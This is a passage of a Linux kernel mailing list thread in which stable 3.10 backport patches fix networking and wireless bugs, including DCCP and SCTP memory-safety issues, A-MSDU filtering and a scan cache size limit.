From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Eric Dumazet, Maciej Żenczykowski, Willem de Bruijn,
	David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 4f2e4ad56a65f3b7d64c258e373cb71e8d2499f4 upstream.

Sending zero checksum is ok for TCP, but not for UDP.

UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.

Simply replace such checksum by 0xffff, regardless of transport.

This error was caught on SIT tunnels, but seems generic.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/core/dev.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/core/dev.c b/net/core/dev.c
index 408f6ee..6494918 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -2234,7 +2234,7 @@ int skb_checksum_help(struct sk_buff *skb)
 			goto out;
 	}
 
-	*(__sum16 *)(skb->data + offset) = csum_fold(csum);
+	*(__sum16 *)(skb->data + offset) = csum_fold(csum) ?: CSUM_MANGLED_0;
 out_set_summed:
 	skb->ip_summed = CHECKSUM_NONE;
 out:
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 261/319] dccp: do not send reset to already closed sockets
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (159 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 260/319] net: mangle zero checksum in skb_checksum_help() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 262/319] dccp: fix out of bound access in dccp_v4_err() Willy Tarreau
                   ` (57 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 346da62cc186c4b4b1ac59f87f4482b47a047388 upstream.

Andrey reported following warning while fuzzing with syzkaller

WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
Kernel panic - not syncing: panic_on_warn set ...

CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
 ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
 ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
 0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
Call Trace:
 [<     inline     >] __dump_stack lib/dump_stack.c:15
 [<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
 [<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
 [<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
 [<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
 [<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
 [<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
 [<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
 [<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
 [<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
 [<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
 [<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
 [<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
 [<     inline     >] exit_task_work include/linux/task_work.h:21
 [<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
 [<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
 [<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
 [<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
 [<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130
arch/x86/entry/common.c:156
 [<     inline     >] prepare_exit_to_usermode arch/x86/entry/common.c:190
 [<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0
arch/x86/entry/common.c:259
 [<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
Dumping ftrace buffer:
   (ftrace buffer empty)
Kernel Offset: disabled

Fix this the same way we did for TCP in commit 565b7b2d2e63
("tcp: do not send reset to already closed sockets")

Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/dccp/proto.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/net/dccp/proto.c b/net/dccp/proto.c
index 6c7c78b8..cb55fb9 100644
--- a/net/dccp/proto.c
+++ b/net/dccp/proto.c
@@ -1012,6 +1012,10 @@ void dccp_close(struct sock *sk, long timeout)
 		__kfree_skb(skb);
 	}
 
+	/* If socket has been already reset kill it. */
+	if (sk->sk_state == DCCP_CLOSED)
+		goto adjudge_to_death;
+
 	if (data_was_unread) {
 		/* Unread data was tossed, send an appropriate Reset Code */
 		DCCP_WARN("ABORT with %u bytes unread\n", data_was_unread);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 262/319] dccp: fix out of bound access in dccp_v4_err()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (160 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 261/319] dccp: do not send reset to already closed sockets Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 263/319] sctp: assign assoc_id earlier in __sctp_connect Willy Tarreau
                   ` (56 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 6706a97fec963d6cb3f7fc2978ec1427b4651214 upstream.

dccp_v4_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.

This patch might allow to process more ICMP messages, as some routers
are still limiting the size of reflected bytes to 28 (RFC 792), instead
of extended lengths (RFC 1812 4.3.2.3)

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/dccp/ipv4.c | 14 ++++++++------
 1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
index ebc54fe..294c642 100644
--- a/net/dccp/ipv4.c
+++ b/net/dccp/ipv4.c
@@ -212,7 +212,7 @@ static void dccp_v4_err(struct sk_buff *skb, u32 info)
 {
 	const struct iphdr *iph = (struct iphdr *)skb->data;
 	const u8 offset = iph->ihl << 2;
-	const struct dccp_hdr *dh = (struct dccp_hdr *)(skb->data + offset);
+	const struct dccp_hdr *dh;
 	struct dccp_sock *dp;
 	struct inet_sock *inet;
 	const int type = icmp_hdr(skb)->type;
@@ -222,11 +222,13 @@ static void dccp_v4_err(struct sk_buff *skb, u32 info)
 	int err;
 	struct net *net = dev_net(skb->dev);
 
-	if (skb->len < offset + sizeof(*dh) ||
-	    skb->len < offset + __dccp_basic_hdr_len(dh)) {
-		ICMP_INC_STATS_BH(net, ICMP_MIB_INERRORS);
-		return;
-	}
+	/* Only need dccph_dport & dccph_sport which are the first
+	 * 4 bytes in dccp header.
+	 * Our caller (icmp_socket_deliver()) already pulled 8 bytes for us.
+	 */
+	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
+	dh = (struct dccp_hdr *)(skb->data + offset);
 
 	sk = inet_lookup(net, &dccp_hashinfo,
 			iph->daddr, dh->dccph_dport,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 263/319] sctp: assign assoc_id earlier in __sctp_connect
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (161 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 262/319] dccp: fix out of bound access in dccp_v4_err() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 264/319] neigh: check error pointer instead of NULL for ipv4_neigh_lookup() Willy Tarreau
                   ` (55 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Marcelo Ricardo Leitner, David S . Miller, Willy Tarreau

From: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>

commit 7233bc84a3aeda835d334499dc00448373caf5c0 upstream.

sctp_wait_for_connect() currently already holds the asoc to keep it
alive during the sleep, in case another thread release it. But Andrey
Konovalov and Dmitry Vyukov reported an use-after-free in such
situation.

Problem is that __sctp_connect() doesn't get a ref on the asoc and will
do a read on the asoc after calling sctp_wait_for_connect(), but by then
another thread may have closed it and the _put on sctp_wait_for_connect
will actually release it, causing the use-after-free.

Fix is, instead of doing the read after waiting for the connect, do it
before so, and avoid this issue as the socket is still locked by then.
There should be no issue on returning the asoc id in case of failure as
the application shouldn't trust on that number in such situations
anyway.

This issue doesn't exist in sctp_sendmsg() path.

Reported-by: Dmitry Vyukov <dvyukov@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/sctp/socket.c | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/net/sctp/socket.c b/net/sctp/socket.c
index 86e7352..ede7c54 100644
--- a/net/sctp/socket.c
+++ b/net/sctp/socket.c
@@ -1231,9 +1231,12 @@ static int __sctp_connect(struct sock* sk,
 
 	timeo = sock_sndtimeo(sk, f_flags & O_NONBLOCK);
 
-	err = sctp_wait_for_connect(asoc, &timeo);
-	if ((err == 0 || err == -EINPROGRESS) && assoc_id)
+	if (assoc_id)
 		*assoc_id = asoc->assoc_id;
+	err = sctp_wait_for_connect(asoc, &timeo);
+	/* Note: the asoc may be freed after the return of
+	 * sctp_wait_for_connect.
+	 */
 
 	/* Don't free association on exit. */
 	asoc = NULL;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 264/319] neigh: check error pointer instead of NULL for ipv4_neigh_lookup()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (162 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 263/319] sctp: assign assoc_id earlier in __sctp_connect Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 265/319] ipv4: use new_gw for redirect neigh lookup Willy Tarreau
                   ` (54 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: WANG Cong, David S . Miller, Willy Tarreau

From: WANG Cong <xiyou.wangcong@gmail.com>

commit 2c1a4311b61072afe2309d4152a7993e92caa41c upstream.

Fixes: commit f187bc6efb7250afee0e2009b6106 ("ipv4: No need to set generic neighbour pointer")
Cc: David S. Miller <davem@davemloft.net>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/route.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/ipv4/route.c b/net/ipv4/route.c
index 93efb89..cbad9b8 100644
--- a/net/ipv4/route.c
+++ b/net/ipv4/route.c
@@ -714,7 +714,7 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow
 	}
 
 	n = ipv4_neigh_lookup(&rt->dst, NULL, &new_gw);
-	if (n) {
+	if (!IS_ERR(n)) {
 		if (!(n->nud_state & NUD_VALID)) {
 			neigh_event_send(n, NULL);
 		} else {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 265/319] ipv4: use new_gw for redirect neigh lookup
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (163 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 264/319] neigh: check error pointer instead of NULL for ipv4_neigh_lookup() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 266/319] mac80211: fix purging multicast PS buffer queue Willy Tarreau
                   ` (53 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Stephen Suryaputra Lin, Stephen Suryaputra Lin, David S . Miller,
	Willy Tarreau

From: Stephen Suryaputra Lin <stephen.suryaputra.lin@gmail.com>

commit 969447f226b451c453ddc83cac6144eaeac6f2e3 upstream.

In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().

After commit 5943634fc559 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never gets resolved and the traffic is blackholed.

So, use the new_gw for neigh lookup.

Changes from v1:
 - use __ipv4_neigh_lookup instead (per Eric Dumazet).

Fixes: 5943634fc559 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/route.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/net/ipv4/route.c b/net/ipv4/route.c
index cbad9b8..e59d633 100644
--- a/net/ipv4/route.c
+++ b/net/ipv4/route.c
@@ -713,7 +713,9 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow
 			goto reject_redirect;
 	}
 
-	n = ipv4_neigh_lookup(&rt->dst, NULL, &new_gw);
+	n = __ipv4_neigh_lookup(rt->dst.dev, new_gw);
+	if (!n)
+		n = neigh_create(&arp_tbl, &new_gw, rt->dst.dev);
 	if (!IS_ERR(n)) {
 		if (!(n->nud_state & NUD_VALID)) {
 			neigh_event_send(n, NULL);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 266/319] mac80211: fix purging multicast PS buffer queue
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (164 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 265/319] ipv4: use new_gw for redirect neigh lookup Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 267/319] mac80211: discard multicast and 4-addr A-MSDUs Willy Tarreau
                   ` (52 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Felix Fietkau, Johannes Berg, Willy Tarreau

From: Felix Fietkau <nbd@nbd.name>

commit 6b07d9ca9b5363dda959b9582a3fc9c0b89ef3b5 upstream.

The code currently assumes that buffered multicast PS frames don't have
a pending ACK frame for tx status reporting.
However, hostapd sends a broadcast deauth frame on teardown for which tx
status is requested. This can lead to the "Have pending ack frames"
warning on module reload.
Fix this by using ieee80211_free_txskb/ieee80211_purge_tx_queue.

Signed-off-by: Felix Fietkau <nbd@nbd.name>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/mac80211/cfg.c | 2 +-
 net/mac80211/tx.c  | 6 +++---
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
index e922bf3..11a10d5 100644
--- a/net/mac80211/cfg.c
+++ b/net/mac80211/cfg.c
@@ -1072,7 +1072,7 @@ static int ieee80211_stop_ap(struct wiphy *wiphy, struct net_device *dev)
 
 	/* free all potentially still buffered bcast frames */
 	local->total_ps_buffered -= skb_queue_len(&sdata->u.ap.ps.bc_buf);
-	skb_queue_purge(&sdata->u.ap.ps.bc_buf);
+	ieee80211_purge_tx_queue(&local->hw, &sdata->u.ap.ps.bc_buf);
 
 	ieee80211_vif_copy_chanctx_to_vlans(sdata, true);
 	ieee80211_vif_release_channel(sdata);
diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
index e960fbe..1299053 100644
--- a/net/mac80211/tx.c
+++ b/net/mac80211/tx.c
@@ -335,7 +335,7 @@ static void purge_old_ps_buffers(struct ieee80211_local *local)
 		skb = skb_dequeue(&ps->bc_buf);
 		if (skb) {
 			purged++;
-			dev_kfree_skb(skb);
+			ieee80211_free_txskb(&local->hw, skb);
 		}
 		total += skb_queue_len(&ps->bc_buf);
 	}
@@ -417,7 +417,7 @@ ieee80211_tx_h_multicast_ps_buf(struct ieee80211_tx_data *tx)
 	if (skb_queue_len(&ps->bc_buf) >= AP_MAX_BC_BUFFER) {
 		ps_dbg(tx->sdata,
 		       "BC TX buffer full - dropping the oldest frame\n");
-		dev_kfree_skb(skb_dequeue(&ps->bc_buf));
+		ieee80211_free_txskb(&tx->local->hw, skb_dequeue(&ps->bc_buf));
 	} else
 		tx->local->total_ps_buffered++;
 
@@ -2711,7 +2711,7 @@ ieee80211_get_buffered_bc(struct ieee80211_hw *hw,
 			sdata = IEEE80211_DEV_TO_SUB_IF(skb->dev);
 		if (!ieee80211_tx_prepare(sdata, &tx, skb))
 			break;
-		dev_kfree_skb_any(skb);
+		ieee80211_free_txskb(hw, skb);
 	}
 
 	info = IEEE80211_SKB_CB(skb);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 267/319] mac80211: discard multicast and 4-addr A-MSDUs
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (165 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 266/319] mac80211: fix purging multicast PS buffer queue Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 268/319] cfg80211: limit scan results cache size Willy Tarreau
                   ` (51 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Johannes Berg, Willy Tarreau

From: Johannes Berg <johannes.berg@intel.com>

commit ea720935cf6686f72def9d322298bf7e9bd53377 upstream.

In mac80211, multicast A-MSDUs are accepted in many cases that
they shouldn't be accepted in:
 * drop A-MSDUs with a multicast A1 (RA), as required by the
   spec in 9.11 (802.11-2012 version)
 * drop A-MSDUs with a 4-addr header, since the fourth address
   can't actually be useful for them; unless 4-address frame
   format is actually requested, even though the fourth address
   is still not useful in this case, but ignored

Accepting the first case, in particular, is very problematic
since it allows anyone else with possession of a GTK to send
unicast frames encapsulated in a multicast A-MSDU, even when
the AP has client isolation enabled.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/mac80211/rx.c | 24 +++++++++++++++---------
 1 file changed, 15 insertions(+), 9 deletions(-)

diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
index cd60be8..f8c7f46 100644
--- a/net/mac80211/rx.c
+++ b/net/mac80211/rx.c
@@ -1952,16 +1952,22 @@ ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx)
 	if (!(status->rx_flags & IEEE80211_RX_AMSDU))
 		return RX_CONTINUE;
 
-	if (ieee80211_has_a4(hdr->frame_control) &&
-	    rx->sdata->vif.type == NL80211_IFTYPE_AP_VLAN &&
-	    !rx->sdata->u.vlan.sta)
-		return RX_DROP_UNUSABLE;
+	if (unlikely(ieee80211_has_a4(hdr->frame_control))) {
+		switch (rx->sdata->vif.type) {
+		case NL80211_IFTYPE_AP_VLAN:
+			if (!rx->sdata->u.vlan.sta)
+				return RX_DROP_UNUSABLE;
+			break;
+		case NL80211_IFTYPE_STATION:
+			if (!rx->sdata->u.mgd.use_4addr)
+				return RX_DROP_UNUSABLE;
+			break;
+		default:
+			return RX_DROP_UNUSABLE;
+		}
+	}
 
-	if (is_multicast_ether_addr(hdr->addr1) &&
-	    ((rx->sdata->vif.type == NL80211_IFTYPE_AP_VLAN &&
-	      rx->sdata->u.vlan.sta) ||
-	     (rx->sdata->vif.type == NL80211_IFTYPE_STATION &&
-	      rx->sdata->u.mgd.use_4addr)))
+	if (is_multicast_ether_addr(hdr->addr1))
 		return RX_DROP_UNUSABLE;
 
 	skb->dev = dev;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 268/319] cfg80211: limit scan results cache size
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (166 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 267/319] mac80211: discard multicast and 4-addr A-MSDUs Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 269/319] mwifiex: printk() overflow with 32-byte SSIDs Willy Tarreau
                   ` (50 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Johannes Berg, Willy Tarreau

From: Johannes Berg <johannes.berg@intel.com>

commit 9853a55ef1bb66d7411136046060bbfb69c714fa upstream.

It's possible to make scanning consume almost arbitrary amounts
of memory, e.g. by sending beacon frames with random BSSIDs at
high rates while somebody is scanning.

Limit the number of BSS table entries we're willing to cache to
1000, limiting maximum memory usage to maybe 4-5MB, but lower
in practice - that would be the case for having both full-sized
beacon and probe response frames for each entry; this seems not
possible in practice, so a limit of 1000 entries will likely be
closer to 0.5 MB.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/wireless/core.h |  1 +
 net/wireless/scan.c | 69 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 70 insertions(+)

diff --git a/net/wireless/core.h b/net/wireless/core.h
index fd35dae..d06da43 100644
--- a/net/wireless/core.h
+++ b/net/wireless/core.h
@@ -69,6 +69,7 @@ struct cfg80211_registered_device {
 	struct list_head bss_list;
 	struct rb_root bss_tree;
 	u32 bss_generation;
+	u32 bss_entries;
 	struct cfg80211_scan_request *scan_req; /* protected by RTNL */
 	struct cfg80211_sched_scan_request *sched_scan_req;
 	unsigned long suspend_at;
diff --git a/net/wireless/scan.c b/net/wireless/scan.c
index 81019ee..15ef127 100644
--- a/net/wireless/scan.c
+++ b/net/wireless/scan.c
@@ -55,6 +55,19 @@
  * also linked into the probe response struct.
  */
 
+/*
+ * Limit the number of BSS entries stored in mac80211. Each one is
+ * a bit over 4k at most, so this limits to roughly 4-5M of memory.
+ * If somebody wants to really attack this though, they'd likely
+ * use small beacons, and only one type of frame, limiting each of
+ * the entries to a much smaller size (in order to generate more
+ * entries in total, so overhead is bigger.)
+ */
+static int bss_entries_limit = 1000;
+module_param(bss_entries_limit, int, 0644);
+MODULE_PARM_DESC(bss_entries_limit,
+                 "limit to number of scan BSS entries (per wiphy, default 1000)");
+
 #define IEEE80211_SCAN_RESULT_EXPIRE	(30 * HZ)
 
 static void bss_free(struct cfg80211_internal_bss *bss)
@@ -135,6 +148,10 @@ static bool __cfg80211_unlink_bss(struct cfg80211_registered_device *dev,
 
 	list_del_init(&bss->list);
 	rb_erase(&bss->rbn, &dev->bss_tree);
+	dev->bss_entries--;
+	WARN_ONCE((dev->bss_entries == 0) ^ list_empty(&dev->bss_list),
+		  "rdev bss entries[%d]/list[empty:%d] corruption\n",
+		  dev->bss_entries, list_empty(&dev->bss_list));
 	bss_ref_put(dev, bss);
 	return true;
 }
@@ -338,6 +355,40 @@ void cfg80211_bss_expire(struct cfg80211_registered_device *dev)
 	__cfg80211_bss_expire(dev, jiffies - IEEE80211_SCAN_RESULT_EXPIRE);
 }
 
+static bool cfg80211_bss_expire_oldest(struct cfg80211_registered_device *rdev)
+{
+	struct cfg80211_internal_bss *bss, *oldest = NULL;
+	bool ret;
+
+	lockdep_assert_held(&rdev->bss_lock);
+
+	list_for_each_entry(bss, &rdev->bss_list, list) {
+		if (atomic_read(&bss->hold))
+			continue;
+
+		if (!list_empty(&bss->hidden_list) &&
+		    !bss->pub.hidden_beacon_bss)
+			continue;
+
+		if (oldest && time_before(oldest->ts, bss->ts))
+			continue;
+		oldest = bss;
+	}
+
+	if (WARN_ON(!oldest))
+		return false;
+
+	/*
+	 * The callers make sure to increase rdev->bss_generation if anything
+	 * gets removed (and a new entry added), so there's no need to also do
+	 * it here.
+	 */
+
+	ret = __cfg80211_unlink_bss(rdev, oldest);
+	WARN_ON(!ret);
+	return ret;
+}
+
 const u8 *cfg80211_find_ie(u8 eid, const u8 *ies, int len)
 {
 	while (len > 2 && ies[0] != eid) {
@@ -622,6 +673,7 @@ static bool cfg80211_combine_bsses(struct cfg80211_registered_device *dev,
 	const u8 *ie;
 	int i, ssidlen;
 	u8 fold = 0;
+	u32 n_entries = 0;
 
 	ies = rcu_access_pointer(new->pub.beacon_ies);
 	if (WARN_ON(!ies))
@@ -645,6 +697,12 @@ static bool cfg80211_combine_bsses(struct cfg80211_registered_device *dev,
 	/* This is the bad part ... */
 
 	list_for_each_entry(bss, &dev->bss_list, list) {
+		/*
+		 * we're iterating all the entries anyway, so take the
+		 * opportunity to validate the list length accounting
+		 */
+		n_entries++;
+
 		if (!ether_addr_equal(bss->pub.bssid, new->pub.bssid))
 			continue;
 		if (bss->pub.channel != new->pub.channel)
@@ -674,6 +732,10 @@ static bool cfg80211_combine_bsses(struct cfg80211_registered_device *dev,
 				   new->pub.beacon_ies);
 	}
 
+	WARN_ONCE(n_entries != dev->bss_entries,
+		  "rdev bss entries[%d]/list[len:%d] corruption\n",
+		  dev->bss_entries, n_entries);
+
 	return true;
 }
 
@@ -818,7 +880,14 @@ cfg80211_bss_update(struct cfg80211_registered_device *dev,
 			}
 		}
 
+		if (dev->bss_entries >= bss_entries_limit &&
+		    !cfg80211_bss_expire_oldest(dev)) {
+			kfree(new);
+			goto drop;
+		}
+
 		list_add_tail(&new->list, &dev->bss_list);
+		dev->bss_entries++;
 		rb_insert_bss(dev, new);
 		found = new;
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 269/319] mwifiex: printk() overflow with 32-byte SSIDs
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (167 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 268/319] cfg80211: limit scan results cache size Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 270/319] ipv4: Set skb->protocol properly for local output Willy Tarreau
                   ` (49 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Brian Norris, Kalle Valo, Willy Tarreau

From: Brian Norris <briannorris@chromium.org>

commit fcd2042e8d36cf644bd2d69c26378d17158b17df upstream.

SSIDs aren't guaranteed to be 0-terminated. Let's cap the max length
when we print them out.

This can be easily noticed by connecting to a network with a 32-octet
SSID:

[ 3903.502925] mwifiex_pcie 0000:01:00.0: info: trying to associate to
